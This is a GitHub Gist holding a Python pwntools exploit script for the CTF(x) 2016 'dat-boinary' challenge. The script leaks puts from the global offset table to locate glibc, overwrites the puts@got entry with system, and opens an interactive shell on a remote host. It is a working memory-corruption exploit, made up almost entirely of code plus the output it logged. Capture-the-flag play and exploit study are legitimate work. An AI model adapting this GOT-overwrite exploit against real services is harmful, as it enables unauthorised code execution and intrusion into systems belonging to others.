Last active
September 14, 2016 13:53
-
-
Save hugsy/32e4fdf200dd471defc9e32dda4891e7 to your computer and use it in GitHub Desktop.
CTF(x) 2016 dat-boinary
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python2 | |
# [+] Opening connection to 172.28.128.3 on port 1338: Done | |
# [*] Smash null byte | |
# [*] Reading from memory | |
# [*] Leaked puts@glibc at 0xb7665650 | |
# [*] system@glibc is at 0xb7640190 | |
# [*] Overwriting puts@got with system@glibc | |
# [*] Triggering | |
# [*] Switching to interactive mode | |
from pwn import * | |
context.update(arch='i386', os='linux') | |
def smash(r): | |
r.recvuntil("Before we start, please give your meme an id") | |
r.send('a'*9) | |
r.recvuntil("What would you like to do?") | |
r.recvuntil("==> ") | |
r.sendline('') | |
r.sendline('5') | |
r.recvuntil('\nsecret') | |
return | |
def read_from_memory(r, addr): | |
r.recvuntil("==> ") | |
r.sendline('1') | |
r.recvuntil('3nt3r ur m3m3 id') | |
r.sendline('A'*12 + p32(addr) + 'B'*7) | |
r.sendline('4') | |
r.recvuntil('Ur meme c0nT3nT:\t') | |
return r.recvuntil('==> ') | |
def write_in_memory(r, addr, data): | |
r.sendline('1') | |
r.recvuntil('3nt3r ur m3m3 id') | |
r.sendline('A'*12 + p32(addr) + 'B'*7) | |
r.recvuntil("==> ") | |
r.sendline('2') | |
r.recvuntil('3nt3r teh d4nkn3ess 0f m3me') | |
r.sendline(str(len(data)+1)) | |
r.recvuntil("==> ") | |
r.sendline('3') | |
r.sendline(data) | |
return | |
if __name__ == "__main__": | |
puts_got = 0x8049118 | |
r = remote("172.28.128.3", 1338) | |
# r = remote("problems.ctfx.io", 1338) | |
log.info("Smash null byte") | |
smash(r) | |
log.info("Reading from memory") | |
data = read_from_memory(r, puts_got) | |
puts_leak = u32(data[0:4]) | |
log.info("Leaked puts@glibc at %#x" % puts_leak) | |
libc_base = puts_leak - 0x65650 | |
system_addr = libc_base + 0x40190 | |
log.info("system@glibc is at %#x" % system_addr) | |
log.info("Overwriting puts@got with system@glibc") | |
write_in_memory(r, puts_got, p32(system_addr)) | |
log.info("Triggering") | |
r.recvuntil('==>') | |
r.sendline('5') | |
r.recvuntil('whaddup!') | |
r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment